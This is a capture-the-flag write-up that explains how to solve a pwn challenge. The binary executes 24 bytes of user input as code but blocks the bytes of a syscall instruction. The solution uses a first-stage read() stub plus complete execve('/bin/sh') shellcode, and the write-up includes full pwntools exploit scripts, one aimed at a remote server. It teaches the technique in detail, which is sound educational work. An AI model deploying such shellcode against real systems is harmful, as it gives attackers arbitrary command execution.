Intro to Assembly

04/03/2024

AmonRa 14

The Challenge

This challenge was part of the UNbreakable 2024 CTF, in the individual category.

Name: Intro-to-assembly
Category: Pwn
Difficulty: Easy
Solves: 24
Description: I want the shell, but they want me to work for it :(

Discovery

The first thing we see when we lay eyes upon this challenge is that we have access to an address where we can connect remotely and that we are given the binary file intro-to-assembly.

If we open this file in IDA and go to the main function, this is what we get:

After analyzing it, we can confidently say that the function works as follows:

Uses the mmap() function to allocate 24 bytes of memory, with permissions set to read, write, and execute.
Uses the read() function to read 24 bytes from standard input into the buffer.
Initializes the ‘dest’ variable with zeros and then copies the input from ‘buf’ into ‘dest’ based on the length of the input.
Starts looping through each byte of the input.
Checks to see if the current byte is 0x31(‘1’), 0x0F or 0x05.
If found, it will print an error message and exit the program.
Otherwise, it will execute the buffer as code.
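The byte check in the steps above can be approximated in a few lines of Python. This is only a sketch of the logic as read from the decompilation, not the binary's actual code; the names FORBIDDEN and find_forbidden are made up for illustration.

```python
# Bytes the challenge rejects, as listed above: '1' (0x31), 0x0F and 0x05.
FORBIDDEN = {0x31, 0x0F, 0x05}

def find_forbidden(payload: bytes) -> list:
    """Return the offsets of every rejected byte in the payload."""
    return [i for i, b in enumerate(payload) if b in FORBIDDEN]

# 'syscall' assembles to 0F 05, so both of its bytes are rejected.
print(find_forbidden(b"\x0f\x05"))  # [0, 1]
# 'push rax; pop rdi' (50 5F) passes the check.
print(find_forbidden(b"\x50\x5f"))  # []
```

Running a candidate payload through a helper like this before sending it saves a round trip to the debugger.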

In addition to the functionality described above, it is worth mentioning the __readfsqword(0x28u) call that appears at the beginning and at the end of the function. It reads the stack canary, a buffer overflow protection, which can also be confirmed by running the command checksec --file=intro-to-assembly :

Exploitation & Debugging

While the discovery phase was fairly straightforward, we now need to find a way to exploit the file. We know that we cannot do a buffer overflow and we know that we can input up to 24 bytes of code into the buffer. The first idea we could try is to see if we can input a syscall, but remember that we also have a check for specific bytes. If we use an online assembler we can see that ‘syscall’ has the raw hex bytes ‘0F05’, exactly the sequence that we are prevented from using.

The next idea we could try is to first input a payload that calls the read function again. This might work because the second input wouldn’t pass through the byte check, so we can write whatever we want. Let’s try it with the following input:

mov    rsi,rdx     
push   rax         
pop    rdi
mov    rdx,0x100
push   0x401110
pop    rax
call   rax

To explain how this works: when the program calls our buffer with call rdx, rdx holds the buffer’s address, so mov rsi,rdx tells read to store the new input in that same buffer. Then we need a ‘0’ in rdi in order to read from standard input. In our case rax contained 0, so I copied the value of rax into rdi with push rax / pop rdi. Then we set rdx to ‘0x100’ to specify how many bytes to read. After that, we store the address of the PLT entry of the read function in rax and call it.
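To see how these instructions map onto bytes, the encoding can be tallied instruction by instruction. The byte values below are copied from the payload used in this write-up; the STAGE1 table and the variable names are just for illustration.

```python
# Each instruction of the first payload with its machine-code bytes.
STAGE1 = [
    ("mov rsi, rdx",   bytes.fromhex("4889d6")),
    ("push rax",       bytes.fromhex("50")),
    ("pop rdi",        bytes.fromhex("5f")),
    ("mov rdx, 0x100", bytes.fromhex("48c7c200010000")),
    ("push 0x401110",  bytes.fromhex("6810114000")),
    ("pop rax",        bytes.fromhex("58")),
    ("call rax",       bytes.fromhex("ffd0")),
]

stage1 = b"".join(code for _, code in STAGE1)

# Print each instruction with its starting offset in the buffer.
offset = 0
for text, code in STAGE1:
    print(f"{offset:2d}: {code.hex():<16} {text}")
    offset += len(code)

print(len(stage1))                                   # 20
print(any(b in (0x31, 0x0F, 0x05) for b in stage1))  # False
```

The last offset matters later: call rax ends at byte 20, so that is where execution resumes once read returns.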

We can verify that code using an online assembler and we see this:

Our input is 20 bytes long, so it fits into the 24 bytes we have allocated, and it does not contain any of the restricted bytes. At the moment our code looks like this:

  
from pwn import *

context.terminal = ['tmux','splitw','-h']

p = process("intro-to-assembly")

shellcode = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # 20bytes len

gdb.attach(p)

p.send(shellcode)

p.interactive()

Let’s jump into gdb and see if we get the desired result. First we’ll type finish so that we skip over the initialization code and get to the main function. Then, we’ll type disass main to disassemble the main function. At this point we see this:

So we’re going to copy the address of the call rdx instruction and set a breakpoint at that address. Then we’ll type continue to reach it. We are interested in this instruction because rdx holds the address of the buffer where our input is stored, so this call is what executes it, which is confirmed by this snippet we can see in IDA:

Once we hit the breakpoint at call rdx, we can use si to step into the next instruction.

Doing this, we see that the next instructions are precisely our code. Awesome! Now, if we continue to step through the following instructions, at some point we won’t be able to anymore, as seen below:

At this stage the program is actually waiting for our input. Now if we jump over to the left side of our terminal and input something, we can see on the right side that our program automatically jumps to the next instruction.

If you look on the right side at the rsi register you can see that it points to our input, just like we told it to in our code. So it works as expected. So far so good, all we need to do now is to insert a payload in the second input that will give us shell access. We can use this one:

"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05"

The disassembled version looks like this:

0:  31 c0                   xor    eax,eax
2:  48 bb d1 9d 96 91 d0    movabs rbx,0xff978cd091969dd1
9:  8c 97 ff
c:  48 f7 db                neg    rbx
f:  53                      push   rbx
10: 54                      push   rsp
11: 5f                      pop    rdi
12: 99                      cdq
13: 52                      push   rdx
14: 57                      push   rdi
15: 54                      push   rsp
16: 5e                      pop    rsi
17: b0 3b                   mov    al,0x3b
19: 0f 05                   syscall

You can find this on the Internet and it requires no adjustments in order to work. However, I’m going to explain how it works, just because it’s interesting to see. First of all, let’s understand our purpose. We’re planning to use the execve() syscall in order to gain access to the shell. What the syscall does is it starts a new process in place of the one currently running. If you look at the manual page I’ve added to the resources section, you’ll see that the structure of the execve() syscall looks like this:

int execve(const char *pathname, char *const _Nullable argv[],
                  char *const _Nullable envp[]);

As you can see, it takes 3 arguments: the pathname of the program to execute, an array of string arguments (argv) and an array of strings (envp) representing the environment variables for the new program. For the first argument, the path we need to specify is /bin/sh, which will open a new shell instance. The second argument is an array in which you first specify the name of the executed program and then any other command-line arguments you want to pass to it. Since we don’t want the shell to start in a modified state, we need only the name. So our second argument should look like this: ["/bin/sh", NULL], with a NULL pointer at the end to mark the end of the array. The final argument will also be NULL since we don’t require environment variables in this case. All together, our final syscall should look like this: execve("/bin/sh", ["/bin/sh", NULL], NULL). Let’s see how this payload accomplishes that.

xor eax, eax

This is an efficient way of setting the eax register to 0 by XORing the value with itself, which often uses fewer bytes than moving an immediate value into the register. eax will later be used to specify the syscall number.

movabs rbx,0xff978cd091969dd1
neg    rbx
push   rbx

These three work together in an interesting way. The first instruction moves the immediate value 0xff978cd091969dd1 into rbx. The second instruction negates that value (two’s complement), and the result is 0x0068732f6e69622f. Doesn’t seem interesting yet? Let’s convert the resulting value to its ASCII representation, most significant byte first: we get ‘\0hs/nib/’. Since x86-64 is little-endian, the bytes are stored in memory in the opposite order, which gives '/bin/sh\0', exactly the path we need to gain shell access. The reason this payload goes through the process of negating it is that the plain value 0x0068732f6e69622f contains a NULL byte (0x00), and if the shellcode is delivered through something that treats it as a C string, it would be cut off at that byte. The encoded value 0xff978cd091969dd1 contains no NULL byte, so we avoid that. The third instruction just pushes the resulting value onto the stack.
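The negation is easy to check by hand in Python. The snippet below is a small sketch that models neg on a 64-bit register with a mask; MASK64, encoded and decoded are illustrative names.

```python
MASK64 = (1 << 64) - 1

encoded = 0xff978cd091969dd1
# 'neg rbx' computes the two's complement: (0 - rbx) modulo 2**64.
decoded = (-encoded) & MASK64

print(hex(decoded))                   # 0x68732f6e69622f
# x86-64 is little-endian, so 'push rbx' stores the low byte first.
print(decoded.to_bytes(8, "little"))  # b'/bin/sh\x00'
# The encoded immediate itself contains no NULL byte.
print(0 in encoded.to_bytes(8, "little"))  # False
```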

push rsp
pop  rdi

This pushes the value of rsp (the stack pointer) onto the stack. Right after push rbx, rsp is the address of the /bin/sh string. Then it pops that value into rdi, setting it up as the first argument to the execve syscall, which expects a pointer to the path of the program to execute.

cdq

This is just a way to set rdx to 0, which sets the third argument of execve() to NULL. In short, cdq sign-extends eax into edx:eax, so edx is filled with copies of eax’s sign bit. After xor eax,eax that bit is 0, so edx becomes 0, and because writing a 32-bit register zeroes the upper 32 bits of the full register, rdx is 0 as well.
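As a quick illustration of what cdq does to edx, here is a tiny Python model. The function name cdq is simply borrowed from the instruction; it only models the edx result, not the full register file.

```python
def cdq(eax: int) -> int:
    """Return the value cdq leaves in edx for a given 32-bit eax."""
    # cdq sign-extends eax into edx:eax, so edx is all ones when bit 31
    # of eax is set and all zeros otherwise.
    return 0xFFFFFFFF if eax & 0x80000000 else 0

print(hex(cdq(0)))           # 0x0
print(hex(cdq(0x80000000)))  # 0xffffffff
```

This is why the trick only clears rdx when eax is known to be non-negative, which xor eax,eax guarantees.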

push   rdx
push   rdi
push   rsp
pop    rsi

These instructions manipulate the stack to set up the second argument to execve, the array of arguments to the program. Pushing rdx (which is zero) and then rdi (the address of /bin/sh) builds an argv array on the stack with a single element that is terminated by a NULL pointer. push rsp followed by pop rsi then copies the address of that array into rsi, setting it up as the second argument to the execve syscall. Below is a visualization of the stack at that point.

+-----------------------+ <- Higher Memory Address
| "/bin/sh\0"           | <- rdi points here
+-----------------------+
| NULL                  | <- argv[1]
+-----------------------+
| Address of "/bin/sh"  | <- argv[0]; rsp and rsi point here
+-----------------------+ <- Lower Memory Address
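The same stack manipulation can be replayed with a toy stack in Python. This is only a model: the starting rsp is a made-up address, and push and pop are helper functions written for this sketch.

```python
# Toy model of the stack: a dict from address to 8-byte value.
stack = {}
rsp = 0x7ffc0000  # arbitrary, made-up starting address
rdx = 0           # cleared by cdq

def push(value):
    """Decrement rsp by 8 and store the value there."""
    global rsp
    rsp -= 8
    stack[rsp] = value

def pop():
    """Load the value at rsp and increment rsp by 8."""
    global rsp
    value = stack.pop(rsp)
    rsp += 8
    return value

push(int.from_bytes(b"/bin/sh\x00", "little"))  # push rbx
push(rsp)                                        # push rsp
rdi = pop()                                      # pop rdi
push(rdx)                                        # push rdx -> argv[1] = NULL
push(rdi)                                        # push rdi -> argv[0]
push(rsp)                                        # push rsp
rsi = pop()                                      # pop rsi

print(stack[rdi].to_bytes(8, "little"))  # b'/bin/sh\x00'
print(stack[rsi] == rdi)                 # True: argv[0] is the string address
print(stack[rsi + 8])                    # 0: argv[1] is NULL
```

Note that push(rsp) passes the value rsp had before the decrement, which matches how push rsp behaves on x86-64.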

mov    al,0x3b

Moves 0x3b into the lower 8 bits of the eax register, preparing for the syscall invocation. 0x3b is 59 in decimal, which is the syscall number of execve().

syscall

Executes the syscall instruction, with all the args we’ve set up so far. So in the end, execve("/bin/sh", ["/bin/sh", NULL], NULL) will be called, which will start a new instance of the shell, giving us access to execute arbitrary commands on the server.

  
from pwn import *

context.terminal = ['tmux','splitw','-h']

p = process("intro-to-assembly")

shellcode_first_input = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # 20bytes len

gdb.attach(p)

shellcode_second_input = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" # 27 bytes len

payload = b'A' * 0x15 + shellcode_second_input

p.send(shellcode_first_input.ljust(0x18, b"\x90"))
p.sendline(payload)

p.interactive()

One part that was necessary to add to the code was the .ljust(0x18, b"\x90"). It pads our first payload to 0x18 (24) bytes with the byte \x90, which is the NOP (“no operation”) instruction. It essentially does nothing, which is very helpful to us. Why do we need it? In the first debugging session we didn’t, because we were only sending one payload. But now we’re sending two, which changes things.

You probably noticed we are sending the first payload with send() instead of sendline(). That is because sendline() would add a \n at the end, which would be interpreted as shellcode and mess up our payload. As a consequence of not sending a newline, we also don’t have a separator between the first payload and the second one. Standard input is just a stream of bytes, and the program’s first read() takes up to 24 bytes of whatever has arrived. Because both payloads are sent really fast one after another, either to our program locally or to the server remotely, that read() can return our 20-byte payload plus the first 4 bytes of the second one (which it did, causing a segmentation fault). Since our payload is 20 bytes and read() reads 24, we fill the rest of the input with NOPs, so the first read() consumes exactly the first payload and the second one arrives intact.

This is only one way of fixing this. Another way would be to add input("????") between sending the first payload and the second one. That way, when our first payload runs and calls read again, the second payload has not been sent yet. The script pauses and waits for you to press enter, and only then sends the second input. This also solves the problem.
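The boundary problem that the NOP padding solves can be reproduced without the binary. The sketch below uses io.BytesIO as a stand-in for standard input when both payloads are already queued; first_read and the stage2 placeholder are invented for this example, and a real pipe or socket may of course deliver data in different chunks.

```python
import io

stage1 = bytes.fromhex("4889d6505f48c7c200010000681011400058ffd0")  # 20 bytes
stage2 = b"SECOND-STAGE"  # placeholder for the second payload

def first_read(queued: bytes, size: int = 24):
    """Model the program's read(0, buf, 24) on data that is already queued."""
    stream = io.BytesIO(queued)
    taken = stream.read(size)
    return taken, stream.read()

# Unpadded: the first read also swallows 4 bytes of the second payload.
taken, left = first_read(stage1 + stage2)
print(taken[20:], left)  # b'SECO' b'ND-STAGE'

# Padded to 24 bytes with NOPs: the two payloads stay separate.
taken, left = first_read(stage1.ljust(24, b"\x90") + stage2)
print(taken[20:], left)  # b'\x90\x90\x90\x90' b'SECOND-STAGE'
```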

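Another thing I added is the run of A characters right before the second payload. The second read() writes to the start of the buffer (rsi still holds the buffer address), but execution resumes right after our call rax, at offset 20 of the buffer. If we remove the padding, you can see that after the read function rsi points exactly at the beginning of our payload, and that after the “ret” execution continues from push rdi, the 9th instruction of our payload (offset 0x14 in the listing above). That’s definitely not good.

Now, if we keep the padding, rsi points at our A bytes (shown as 0x41), which only fill the part of the buffer that has already been executed, so the second payload lands where execution resumes. As you can see below, after the ret execution lands at the start of our payload, as designed. Strictly speaking, 20 bytes (0x14) of padding would line the payload up exactly. With the 0x15 used in the script, one extra 0x41 is decoded as a prefix of the first instruction (turning xor eax,eax into xor r8d,eax), which happens to be harmless here because eax holds the small, positive return value of read().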
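The effect of the padding can be checked without a debugger. The sketch below assumes that the second read() writes from the start of the buffer and that execution resumes at offset 20, right after the 20-byte first payload; RESUME_OFFSET and resumed_bytes are names made up for this illustration.

```python
stage2 = bytes.fromhex(
    "31c048bbd19d9691d08c97ff48f7db53545f995257545eb03b0f05"
)
RESUME_OFFSET = 20  # 'call rax' ends at byte 20 of the first payload

def resumed_bytes(padding: int) -> bytes:
    """First three bytes the CPU sees when read() returns."""
    buffer = b"A" * padding + stage2  # read() writes from offset 0
    return buffer[RESUME_OFFSET:RESUME_OFFSET + 3]

# No padding: execution lands on push rdi; push rsp; pop rsi.
print(resumed_bytes(0).hex())     # 57545e
# 20 bytes of padding: execution lands on xor eax,eax.
print(resumed_bytes(0x14).hex())  # 31c048
# 21 bytes, as in the script: one 0x41 comes first and acts as a prefix.
print(resumed_bytes(0x15).hex())  # 4131c0
```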

If we run the debugging process we did above again, this time, instead of getting to a point where the program waits for input, we can keep stepping through instructions until the last syscall where we see this:

As you can see, our payload worked. And so did our strategy. Even though this payload contains the 0x0F 0x05 sequence, it never passed through the byte check and it got executed without problems. Now before we move to the final step and get that flag, I just wanna point out a neat little detail. We’ve already seen how we bypassed the “illegal” byte check, but you might be wondering: how does our second payload work, considering it has a length of 27 bytes (plus padding) and we write to the same memory area where mmap() mapped 24 bytes? Aren’t we going over the limit?

This scenario showcases a fundamental concept in computer architecture, specifically within memory management. The mmap function handles memory mapping by aligning it to the boundaries of a memory page. If you look in the resources posted at the end of this write-up, you’ll see I linked the source code of how mmap() works. At the 1208th line, if we start reading we’ll see this part:

	len = PAGE_ALIGN(len);
	if (!len)
		return -ENOMEM;

This code rounds the length up to the next multiple of the page size, which on most systems is 4 KB, so even a request for 24 bytes results in the mapping of a full memory page. The kernel and the MMU manage mappings and their access permissions in units of whole pages, so a mapping cannot be smaller than one page. Our 24-byte request therefore gives us 4096 bytes of readable, writable and executable memory, which is more than enough room for the second payload.
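The rounding itself is a one-liner. Here is a Python sketch of the usual round-up-to-a-power-of-two idiom; it assumes a 4096-byte page (on a real system the value can be read from mmap.PAGESIZE), and page_align is an illustrative name rather than the kernel macro.

```python
PAGE_SIZE = 4096  # assumed page size; must be a power of two

def page_align(length: int) -> int:
    """Round length up to the next multiple of PAGE_SIZE."""
    return (length + PAGE_SIZE - 1) & ~(PAGE_SIZE - 1)

print(page_align(24))    # 4096
print(page_align(4096))  # 4096
print(page_align(4097))  # 8192
print(page_align(0))     # 0
```

A length of 0 stays 0, which is the case the if (!len) check in the kernel snippet rejects.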

Ok, now that we’ve also shown a bit about how memory management works, all we have to do now is comment out the local process and the gdb.attach in our code, and connect remotely like this:

  
from pwn import *

context.terminal = ['tmux','splitw','-h']

#p = process("intro-to-assembly")
p = remote("34.89.210.219",30895)

shellcode_first_input = b"\x48\x89\xD6\x50\x5F\x48\xC7\xC2\x00\x01\x00\x00\x68\x10\x11\x40\x00\x58\xFF\xD0" # First shellcode modified. Used push rax instead of r12

#gdb.attach(p)

shellcode_second_input = b"\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05" # 27 bytes len

payload = b'A' * 0x15 + shellcode_second_input

p.send(shellcode_first_input.ljust(0x18, b"\x90"))
p.sendline(payload)

p.interactive()

Running the file, we have shell access to the server and there’s our flag: CTF{926e420eeeeb6ac4890ddd46af5462d922e01307ef77d97d6799b167ed17e44f}

Conclusion

Whilst this challenge was labeled as easy, being a pwn noob myself, I found I had to be pretty engaged in order to grasp all the concepts, which is precisely why I wrote this in a detailed step-by-step manner. I hope this write-up has been of use and that you learned as much as I did from this challenge.

Resources

Online assembler/disassembler: https://defuse.ca/online-x86-assembler.htm#disassembly2

Functions manual pages: https://man7.org/linux/man-pages/man2/mmap.2.html

https://man7.org/linux/man-pages/man2/read.2.html

https://man7.org/linux/man-pages/man2/execve.2.html

Mmap() source code: https://codebrowser.dev/linux/linux/include/linux/mm.h.html#221
